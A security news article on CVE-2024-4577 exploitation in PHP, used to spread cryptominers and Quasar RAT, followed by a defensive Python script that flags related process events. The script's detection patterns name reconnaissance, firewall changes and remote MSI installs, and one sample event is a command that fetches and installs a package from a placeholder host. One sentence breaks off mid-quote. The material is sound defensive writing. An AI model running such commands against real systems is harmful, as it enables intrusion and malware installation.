Malicious actors are leveraging a severe vulnerability in PHP to distribute cryptocurrency miners and remote access trojans, including Quasar RAT.
The vulnerability, identified as CVE-2024-4577, is an argument injection flaw in PHP that affects Windows-based systems operating in CGI mode, allowing remote attackers to execute arbitrary code.
According to Bitdefender, a cybersecurity firm, there has been a significant increase in exploitation attempts targeting CVE-2024-4577 since late last year, with the majority of attacks originating from Taiwan (54.65%), Hong Kong (27.06%), Brazil (16.39%), Japan (1.57%), and India (0.33%).
Approximately 15% of the detected exploitation attempts involve basic vulnerability checks using commands like “whoami” and “echo
Bitdefender’s Technical Solutions Director, Martin Zugec, noted that around 5% of the detected attacks resulted in the deployment of the XMRig cryptocurrency miner.
“Additionally, a smaller campaign involved the deployment of Nicehash miners, which is a platform that allows users to sell computing power for cryptocurrency,” Zugec added. “The miner process was disguised as a legitimate application, such as javawindows.exe, to evade detection.”
Other attacks have been found to exploit the vulnerability to deliver remote access tools like the open-source Quasar RAT, as well as execute malicious Windows installer (MSI) files hosted on remote servers using cmd.exe.
In a surprising turn of events, Bitdefender also observed attempts to modify firewall configurations on vulnerable servers to block access to known malicious IPs associated with the exploit.
This unusual behavior has raised the possibility that rival cryptojacking groups are competing for control over susceptible resources and preventing them from being targeted again. This is consistent with historical observations about how cryptojacking attacks often terminate rival miner processes before deploying their own payloads.
This development comes shortly after Cisco Talos revealed details of a campaign exploiting the PHP flaw in attacks targeting Japanese organizations since the start of the year.
Users are advised to update their PHP installations to the latest version to protect against potential threats.
“Since most campaigns have been using living-off-the-land (LOTL) tools, organizations should consider limiting the use of tools such as PowerShell within the environment to only privileged users, such as administrators,” Zugec said.
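As an added defensive illustration (not code from Bitdefender, Cisco Talos or this article), the following Python triages constructed process-creation events for the post-exploitation behaviours described above: a shell spawned by the PHP CGI binary, the whoami/echo checks, remote MSI execution through msiexec, firewall rule changes and the javawindows.exe disguise. It assumes Sysmon-style fields (parent_image, image, command_line), that the CGI binary is php-cgi.exe, and that the firewall changes were made with netsh (the article does not say how they were made).

```python
"""Triage process-creation events for the CVE-2024-4577 post-exploitation
behaviours reported above. Added example; assumes Sysmon Event ID 1 style
fields (parent_image, image, command_line) and a CGI binary named php-cgi.exe."""
import re

WEB_PARENTS = {"php-cgi.exe"}  # assumption: PHP running in CGI mode under a web server
SHELLS = {"cmd.exe", "powershell.exe"}  # LOTL tools named in the article
RECON = re.compile(r"\b(whoami|echo)\b", re.I)  # basic checks the article describes
REMOTE_MSI = re.compile(r"msiexec(\.exe)?\s.*https?://", re.I)  # MSI fetched from a remote server
FIREWALL = re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule", re.I)  # assumption: netsh used
DISGUISED_MINER = {"javawindows.exe"}  # disguise name reported in the article

def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> list[str]:
    """Return the list of behaviours an event matches (empty if benign)."""
    parent = basename(event.get("parent_image", ""))
    image = basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    findings = []
    if parent in WEB_PARENTS and image in SHELLS:
        findings.append("shell spawned by PHP CGI")
        if RECON.search(cmd):
            findings.append("recon command (whoami/echo)")
    if REMOTE_MSI.search(cmd):
        findings.append("msiexec with remote package")
    if FIREWALL.search(cmd):
        findings.append("firewall rule change")
    if image in DISGUISED_MINER:
        findings.append("process name matches reported miner disguise")
    return findings

def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and findings for every event that matched at least one behaviour."""
    return [(i, f) for i, e in enumerate(events) if (f := classify(e))]

SAMPLE_EVENTS = [  # constructed sample telemetry, not real events
    {"parent_image": r"C:\php\php-cgi.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c whoami"},
    {"parent_image": r"C:\php\php-cgi.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c msiexec /i http://example.invalid/pkg.msi /qn"},  # placeholder host
    {"parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Users\Public\javawindows.exe",
     "command_line": "javawindows.exe"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c echo hello"},  # console user, no PHP parent: not flagged
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(idx, hits)
```

The PHP-parent condition is what keeps ordinary administrator use of cmd.exe or echo out of the alert stream; the miner-name and firewall checks apply regardless of parent because the article reports those as later stages run from the already-compromised host.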